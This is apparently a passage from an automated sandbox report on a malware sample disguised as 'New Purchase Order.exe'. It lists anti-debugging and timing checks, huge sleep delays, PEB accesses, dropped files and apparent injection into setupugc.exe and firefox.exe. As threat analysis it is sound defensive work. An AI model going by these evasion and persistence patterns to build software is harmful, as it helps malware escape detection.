            Source: C:\Windows\SysWOW64\setupugc.exe; API coverage: 2.6 %
            Source: C:\Users\user\Desktop\New Purchase Order.exe TID: 6748; Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7316; Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7256; Thread sleep time: -1844674407370954s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7320; Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7288; Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exe TID: 7468; Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\SysWOW64\setupugc.exe TID: 7896; Thread sleep count: 981 > 30
            Source: C:\Windows\SysWOW64\setupugc.exe TID: 7896; Thread sleep time: -1962000s >= -30000s
            Source: C:\Windows\SysWOW64\setupugc.exe TID: 7896; Thread sleep count: 8991 > 30
            Source: C:\Windows\SysWOW64\setupugc.exe TID: 7896; Thread sleep time: -17982000s >= -30000s
            Source: C:\Program Files (x86)\GeKEJexjzTYsUzKOsloCPcDUKICkeCqhPIqCxDtaCtAnddYHHLqbL\kdFPsEWDpy.exe TID: 7916; Thread sleep time: -80000s >= -30000s
            Source: C:\Program Files (x86)\GeKEJexjzTYsUzKOsloCPcDUKICkeCqhPIqCxDtaCtAnddYHHLqbL\kdFPsEWDpy.exe TID: 7916; Thread sleep count: 40 > 30
            Source: C:\Program Files (x86)\GeKEJexjzTYsUzKOsloCPcDUKICkeCqhPIqCxDtaCtAnddYHHLqbL\kdFPsEWDpy.exe TID: 7916; Thread sleep time: -40000s >= -30000s
            Source: C:\Program Files (x86)\GeKEJexjzTYsUzKOsloCPcDUKICkeCqhPIqCxDtaCtAnddYHHLqbL\kdFPsEWDpy.exe TID: 7916; Thread sleep count: 32 > 30
            Source: C:\Program Files (x86)\GeKEJexjzTYsUzKOsloCPcDUKICkeCqhPIqCxDtaCtAnddYHHLqbL\kdFPsEWDpy.exe TID: 7916; Thread sleep time: -48000s >= -30000s
            Source: C:\Windows\System32\conhost.exe; Last function: Thread delayed
            Source: C:\Windows\SysWOW64\setupugc.exe; Last function: Thread delayed
            Source: C:\Windows\SysWOW64\setupugc.exe; Code function: 17_2_02E6C520 FindFirstFileW,FindNextFileW,FindClose; 17_2_02E6C520
            Source: C:\Users\user\Desktop\New Purchase Order.exe; Thread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Thread delayed: delay time: 922337203685477
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exe; Thread delayed: delay time: 922337203685477
            Source: firefox.exe, 00000015.00000002.2197655167.00000194F8B8C000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll/
            Source: kdFPsEWDpy.exe, 00000014.00000002.4111420407.0000000000F4F000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllb
            Source: setupugc.exe, 00000011.00000002.4110652800.0000000003285000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: C:\Users\user\Desktop\New Purchase Order.exe; Process information queried: ProcessInformation
            Source: C:\Users\user\Desktop\New Purchase Order.exe; Process queried: DebugPort
            Source: C:\Users\user\AppData\Roaming\ibDqDkseW.exe; Process queried: DebugPort
            Source: C:\Windows\SysWOW64\setupugc.exe; Process queried: DebugPort
            Source: C:\Users\user\Desktop\New Purchase Order.exe; Code function: 8_2_0117096E rdtsc; 8_2_0117096E
            Source: C:\Users\user\Desktop\New Purchase Order.exe; Code function: 8_2_00417733 LdrLoadDll; 8_2_00417733
            Source: C:\Users\user\Desktop\New Purchase Order.exe; Code function: 8_2_011DA118 mov ecx, dword ptr fs:[00000030h]; 8_2_011DA118
            Source: C:\Users\user\Desktop\New Purchase Order.exe; Code function: 8_2_011DA118 mov eax, dword ptr fs:[00000030h]; 8_2_011DA118
            Source: C:\Users\user\Desktop\New Purchase Order.exe; Code function: 8_2_011F0115 mov eax, dword ptr fs:[00000030h]; 8_2_011F0115
            Source: C:\Users\user\Desktop\New Purchase Order.exe; Code function: 8_2_011DE10E mov eax, dword ptr fs:[00000030h]; 8_2_011DE10E
            Source: C:\Users\user\Desktop\New Purchase Order.exe; Code function: 8_2_011DE10E mov ecx, dword ptr fs:[00000030h]; 8_2_011DE10E
            Source: C:\Users\user\Desktop\New Purchase Order.exe; Code function: 8_2_011DE10E mov eax, dword ptr fs:[00000030h]; 8_2_011DE10E
            Source: C:\Users\user\Desktop\New Purchase Order.exe; Code function: 8_2_011DE10E mov ecx, dword ptr fs:[00000030h]; 8_2_011DE10E
            Source: C:\Users\user\Desktop\New Purchase Order.exe; Code function: 8_2_011DE10E mov eax, dword ptr fs:[00000030h]; 8_2_011DE10E
            Source: C:\Users\user\Desktop\New Purchase Order.exe; Code function: 8_2_011DE10E mov ecx, dword ptr fs:[00000030h]; 8_2_011DE10E
            Source: C:\Users\user\Desktop\New Purchase Order.exe; Code function: 8_2_011DE10E mov eax, dword ptr fs:[00000030h]; 8_2_011DE10E
            Source: C:\Users\user\Desktop\New Purchase Order.exe; Code function: 8_2_011DE10E mov ecx, dword ptr fs:[00000030h]; 8_2_011DE10E
            Source: C:\Users\user\Desktop\New Purchase Order.exe; Code function: 8_2_01160124 mov eax, dword ptr fs:[00000030h]; 8_2_01160124
            Source: C:\Users\user\Desktop\New Purchase Order.exe; Code function: 8_2_0112C156 mov eax, dword ptr fs:[00000030h]; 8_2_0112C156
            Source: C:\Users\user\Desktop\New Purchase Order.exe; Code function: 8_2_011C8158 mov eax, dword ptr fs:[00000030h]; 8_2_011C8158
            Source: C:\Users\user\Desktop\New Purchase Order.exe; Code function: 8_2_01204164 mov eax, dword ptr fs:[00000030h]; 8_2_01204164
            Source: C:\Users\user\Desktop\New Purchase Order.exe; Code function: 8_2_01136154 mov eax, dword ptr fs:[00000030h]; 8_2_01136154
            Source: C:\Users\user\Desktop\New Purchase Order.exe; Code function: 8_2_011C4144 mov eax, dword ptr fs:[00000030h]; 8_2_011C4144
            Source: C:\Users\user\Desktop\New Purchase Order.exe; Code function: 8_2_011C4144 mov ecx, dword ptr fs:[00000030h]; 8_2_011C4144
            Source: C:\Users\user\Desktop\New Purchase Order.exe; Code function: 8_2_011C4144 mov eax, dword ptr fs:[00000030h]; 8_2_011C4144
            Source: C:\Users\user\Desktop\New Purchase Order.exe; Code function: 8_2_011B019F mov eax, dword ptr fs:[00000030h]; 8_2_011B019F
            Source: C:\Users\user\Desktop\New Purchase Order.exe; Code function: 8_2_0112A197 mov eax, dword ptr fs:[00000030h]; 8_2_0112A197
            Source: C:\Users\user\Desktop\New Purchase Order.exe; Code function: 8_2_01170185 mov eax, dword ptr fs:[00000030h]; 8_2_01170185
            Source: C:\Users\user\Desktop\New Purchase Order.exe; Code function: 8_2_011EC188 mov eax, dword ptr fs:[00000030h]; 8_2_011EC188
            Source: C:\Users\user\Desktop\New Purchase Order.exe; Code function: 8_2_011D4180 mov eax, dword ptr fs:[00000030h]; 8_2_011D4180
            Source: C:\Users\user\Desktop\New Purchase Order.exe; Code function: 8_2_012061E5 mov eax, dword ptr fs:[00000030h]; 8_2_012061E5
            Source: C:\Users\user\Desktop\New Purchase Order.exe; Code function: 8_2_011AE1D0 mov eax, dword ptr fs:[00000030h]; 8_2_011AE1D0
            Source: C:\Users\user\Desktop\New Purchase Order.exe; Code function: 8_2_011AE1D0 mov ecx, dword ptr fs:[00000030h]; 8_2_011AE1D0
            Source: C:\Users\user\Desktop\New Purchase Order.exe; Code function: 8_2_011AE1D0 mov eax, dword ptr fs:[00000030h]; 8_2_011AE1D0
            Source: C:\Users\user\Desktop\New Purchase Order.exe; Code function: 8_2_011F61C3 mov eax, dword ptr fs:[00000030h]; 8_2_011F61C3
            Source: C:\Users\user\Desktop\New Purchase Order.exe; Code function: 8_2_011601F8 mov eax, dword ptr fs:[00000030h]; 8_2_011601F8
            Source: C:\Users\user\Desktop\New Purchase Order.exe; Code function: 8_2_0114E016 mov eax, dword ptr fs:[00000030h]; 8_2_0114E016
            Source: C:\Users\user\Desktop\New Purchase Order.exe; Code function: 8_2_011B4000 mov ecx, dword ptr fs:[00000030h]; 8_2_011B4000
            Source: C:\Users\user\Desktop\New Purchase Order.exe; Code function: 8_2_011D2000 mov eax, dword ptr fs:[00000030h]; 8_2_011D2000
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011D2000 mov eax, dword ptr fs:[00000030h]8_2_011D2000
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011D2000 mov eax, dword ptr fs:[00000030h]8_2_011D2000
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011D2000 mov eax, dword ptr fs:[00000030h]8_2_011D2000
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011D2000 mov eax, dword ptr fs:[00000030h]8_2_011D2000
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011C6030 mov eax, dword ptr fs:[00000030h]8_2_011C6030
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0112A020 mov eax, dword ptr fs:[00000030h]8_2_0112A020
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0112C020 mov eax, dword ptr fs:[00000030h]8_2_0112C020
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01132050 mov eax, dword ptr fs:[00000030h]8_2_01132050
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011B6050 mov eax, dword ptr fs:[00000030h]8_2_011B6050
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0115C073 mov eax, dword ptr fs:[00000030h]8_2_0115C073
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0113208A mov eax, dword ptr fs:[00000030h]8_2_0113208A
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011F60B8 mov eax, dword ptr fs:[00000030h]8_2_011F60B8
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011F60B8 mov ecx, dword ptr fs:[00000030h]8_2_011F60B8
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011280A0 mov eax, dword ptr fs:[00000030h]8_2_011280A0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011C80A8 mov eax, dword ptr fs:[00000030h]8_2_011C80A8
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011B20DE mov eax, dword ptr fs:[00000030h]8_2_011B20DE
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0112C0F0 mov eax, dword ptr fs:[00000030h]8_2_0112C0F0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011720F0 mov ecx, dword ptr fs:[00000030h]8_2_011720F0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0112A0E3 mov ecx, dword ptr fs:[00000030h]8_2_0112A0E3
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011380E9 mov eax, dword ptr fs:[00000030h]8_2_011380E9
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011B60E0 mov eax, dword ptr fs:[00000030h]8_2_011B60E0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0112C310 mov ecx, dword ptr fs:[00000030h]8_2_0112C310
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01208324 mov eax, dword ptr fs:[00000030h]8_2_01208324
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01208324 mov ecx, dword ptr fs:[00000030h]8_2_01208324
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01208324 mov eax, dword ptr fs:[00000030h]8_2_01208324
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01208324 mov eax, dword ptr fs:[00000030h]8_2_01208324
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01150310 mov ecx, dword ptr fs:[00000030h]8_2_01150310
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0116A30B mov eax, dword ptr fs:[00000030h]8_2_0116A30B
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0116A30B mov eax, dword ptr fs:[00000030h]8_2_0116A30B
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0116A30B mov eax, dword ptr fs:[00000030h]8_2_0116A30B
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011B035C mov eax, dword ptr fs:[00000030h]8_2_011B035C
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011B035C mov eax, dword ptr fs:[00000030h]8_2_011B035C
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011B035C mov eax, dword ptr fs:[00000030h]8_2_011B035C
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011B035C mov ecx, dword ptr fs:[00000030h]8_2_011B035C
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011B035C mov eax, dword ptr fs:[00000030h]8_2_011B035C
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011B035C mov eax, dword ptr fs:[00000030h]8_2_011B035C
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011FA352 mov eax, dword ptr fs:[00000030h]8_2_011FA352
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011D8350 mov ecx, dword ptr fs:[00000030h]8_2_011D8350
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011B2349 mov eax, dword ptr fs:[00000030h]8_2_011B2349
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011B2349 mov eax, dword ptr fs:[00000030h]8_2_011B2349
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011B2349 mov eax, dword ptr fs:[00000030h]8_2_011B2349
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011B2349 mov eax, dword ptr fs:[00000030h]8_2_011B2349
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011B2349 mov eax, dword ptr fs:[00000030h]8_2_011B2349
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011B2349 mov eax, dword ptr fs:[00000030h]8_2_011B2349
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011B2349 mov eax, dword ptr fs:[00000030h]8_2_011B2349
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011B2349 mov eax, dword ptr fs:[00000030h]8_2_011B2349
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011B2349 mov eax, dword ptr fs:[00000030h]8_2_011B2349
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011B2349 mov eax, dword ptr fs:[00000030h]8_2_011B2349
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011B2349 mov eax, dword ptr fs:[00000030h]8_2_011B2349
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011B2349 mov eax, dword ptr fs:[00000030h]8_2_011B2349
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011B2349 mov eax, dword ptr fs:[00000030h]8_2_011B2349
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011B2349 mov eax, dword ptr fs:[00000030h]8_2_011B2349
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011B2349 mov eax, dword ptr fs:[00000030h]8_2_011B2349
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011D437C mov eax, dword ptr fs:[00000030h]8_2_011D437C
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0120634F mov eax, dword ptr fs:[00000030h]8_2_0120634F
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01128397 mov eax, dword ptr fs:[00000030h]8_2_01128397
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01128397 mov eax, dword ptr fs:[00000030h]8_2_01128397
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01128397 mov eax, dword ptr fs:[00000030h]8_2_01128397
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0112E388 mov eax, dword ptr fs:[00000030h]8_2_0112E388
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0112E388 mov eax, dword ptr fs:[00000030h]8_2_0112E388
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0112E388 mov eax, dword ptr fs:[00000030h]8_2_0112E388
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0115438F mov eax, dword ptr fs:[00000030h]8_2_0115438F
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0115438F mov eax, dword ptr fs:[00000030h]8_2_0115438F
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011DE3DB mov eax, dword ptr fs:[00000030h]8_2_011DE3DB
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011DE3DB mov eax, dword ptr fs:[00000030h]8_2_011DE3DB
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011DE3DB mov ecx, dword ptr fs:[00000030h]8_2_011DE3DB
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011DE3DB mov eax, dword ptr fs:[00000030h]8_2_011DE3DB
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011D43D4 mov eax, dword ptr fs:[00000030h]8_2_011D43D4
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011D43D4 mov eax, dword ptr fs:[00000030h]8_2_011D43D4
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011EC3CD mov eax, dword ptr fs:[00000030h]8_2_011EC3CD
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0113A3C0 mov eax, dword ptr fs:[00000030h]8_2_0113A3C0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0113A3C0 mov eax, dword ptr fs:[00000030h]8_2_0113A3C0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0113A3C0 mov eax, dword ptr fs:[00000030h]8_2_0113A3C0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0113A3C0 mov eax, dword ptr fs:[00000030h]8_2_0113A3C0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0113A3C0 mov eax, dword ptr fs:[00000030h]8_2_0113A3C0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0113A3C0 mov eax, dword ptr fs:[00000030h]8_2_0113A3C0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011383C0 mov eax, dword ptr fs:[00000030h]8_2_011383C0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011383C0 mov eax, dword ptr fs:[00000030h]8_2_011383C0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011383C0 mov eax, dword ptr fs:[00000030h]8_2_011383C0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011383C0 mov eax, dword ptr fs:[00000030h]8_2_011383C0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011B63C0 mov eax, dword ptr fs:[00000030h]8_2_011B63C0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0114E3F0 mov eax, dword ptr fs:[00000030h]8_2_0114E3F0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0114E3F0 mov eax, dword ptr fs:[00000030h]8_2_0114E3F0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0114E3F0 mov eax, dword ptr fs:[00000030h]8_2_0114E3F0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011663FF mov eax, dword ptr fs:[00000030h]8_2_011663FF
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011403E9 mov eax, dword ptr fs:[00000030h]8_2_011403E9
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011403E9 mov eax, dword ptr fs:[00000030h]8_2_011403E9
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011403E9 mov eax, dword ptr fs:[00000030h]8_2_011403E9
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011403E9 mov eax, dword ptr fs:[00000030h]8_2_011403E9
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011403E9 mov eax, dword ptr fs:[00000030h]8_2_011403E9
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011403E9 mov eax, dword ptr fs:[00000030h]8_2_011403E9
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011403E9 mov eax, dword ptr fs:[00000030h]8_2_011403E9
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011403E9 mov eax, dword ptr fs:[00000030h]8_2_011403E9
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0112823B mov eax, dword ptr fs:[00000030h]8_2_0112823B
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0112A250 mov eax, dword ptr fs:[00000030h]8_2_0112A250
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01136259 mov eax, dword ptr fs:[00000030h]8_2_01136259
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011EA250 mov eax, dword ptr fs:[00000030h]8_2_011EA250
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011EA250 mov eax, dword ptr fs:[00000030h]8_2_011EA250
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011B8243 mov eax, dword ptr fs:[00000030h]8_2_011B8243
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011B8243 mov ecx, dword ptr fs:[00000030h]8_2_011B8243
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011E0274 mov eax, dword ptr fs:[00000030h]8_2_011E0274
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011E0274 mov eax, dword ptr fs:[00000030h]8_2_011E0274
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011E0274 mov eax, dword ptr fs:[00000030h]8_2_011E0274
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011E0274 mov eax, dword ptr fs:[00000030h]8_2_011E0274
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011E0274 mov eax, dword ptr fs:[00000030h]8_2_011E0274
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011E0274 mov eax, dword ptr fs:[00000030h]8_2_011E0274
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011E0274 mov eax, dword ptr fs:[00000030h]8_2_011E0274
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011E0274 mov eax, dword ptr fs:[00000030h]8_2_011E0274
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011E0274 mov eax, dword ptr fs:[00000030h]8_2_011E0274
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011E0274 mov eax, dword ptr fs:[00000030h]8_2_011E0274
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011E0274 mov eax, dword ptr fs:[00000030h]8_2_011E0274
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011E0274 mov eax, dword ptr fs:[00000030h]8_2_011E0274
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01134260 mov eax, dword ptr fs:[00000030h]8_2_01134260
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01134260 mov eax, dword ptr fs:[00000030h]8_2_01134260
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01134260 mov eax, dword ptr fs:[00000030h]8_2_01134260
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0112826B mov eax, dword ptr fs:[00000030h]8_2_0112826B
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0120625D mov eax, dword ptr fs:[00000030h]8_2_0120625D
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0116E284 mov eax, dword ptr fs:[00000030h]8_2_0116E284
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0116E284 mov eax, dword ptr fs:[00000030h]8_2_0116E284
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011B0283 mov eax, dword ptr fs:[00000030h]8_2_011B0283
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011B0283 mov eax, dword ptr fs:[00000030h]8_2_011B0283
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011B0283 mov eax, dword ptr fs:[00000030h]8_2_011B0283
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011402A0 mov eax, dword ptr fs:[00000030h]8_2_011402A0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011402A0 mov eax, dword ptr fs:[00000030h]8_2_011402A0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011C62A0 mov eax, dword ptr fs:[00000030h]8_2_011C62A0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011C62A0 mov ecx, dword ptr fs:[00000030h]8_2_011C62A0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011C62A0 mov eax, dword ptr fs:[00000030h]8_2_011C62A0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011C62A0 mov eax, dword ptr fs:[00000030h]8_2_011C62A0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011C62A0 mov eax, dword ptr fs:[00000030h]8_2_011C62A0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011C62A0 mov eax, dword ptr fs:[00000030h]8_2_011C62A0
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0113A2C3 mov eax, dword ptr fs:[00000030h]8_2_0113A2C3
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0113A2C3 mov eax, dword ptr fs:[00000030h]8_2_0113A2C3
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0113A2C3 mov eax, dword ptr fs:[00000030h]8_2_0113A2C3
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0113A2C3 mov eax, dword ptr fs:[00000030h]8_2_0113A2C3
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_0113A2C3 mov eax, dword ptr fs:[00000030h]8_2_0113A2C3
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011402E1 mov eax, dword ptr fs:[00000030h]8_2_011402E1
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011402E1 mov eax, dword ptr fs:[00000030h]8_2_011402E1
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011402E1 mov eax, dword ptr fs:[00000030h]8_2_011402E1
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_012062D6 mov eax, dword ptr fs:[00000030h]8_2_012062D6
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_011C6500 mov eax, dword ptr fs:[00000030h]8_2_011C6500
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01204500 mov eax, dword ptr fs:[00000030h]8_2_01204500
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01204500 mov eax, dword ptr fs:[00000030h]8_2_01204500
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01204500 mov eax, dword ptr fs:[00000030h]8_2_01204500
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01204500 mov eax, dword ptr fs:[00000030h]8_2_01204500
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01204500 mov eax, dword ptr fs:[00000030h]8_2_01204500
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01204500 mov eax, dword ptr fs:[00000030h]8_2_01204500
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01204500 mov eax, dword ptr fs:[00000030h]8_2_01204500
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01140535 mov eax, dword ptr fs:[00000030h]8_2_01140535
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01140535 mov eax, dword ptr fs:[00000030h]8_2_01140535
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01140535 mov eax, dword ptr fs:[00000030h]8_2_01140535
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01140535 mov eax, dword ptr fs:[00000030h]8_2_01140535
            Source: C:\Users\user\Desktop\New Purchase Order.exeCode function: 8_2_01140535 mov eax, dword ptr fs:[00000030h]8_2_01140535
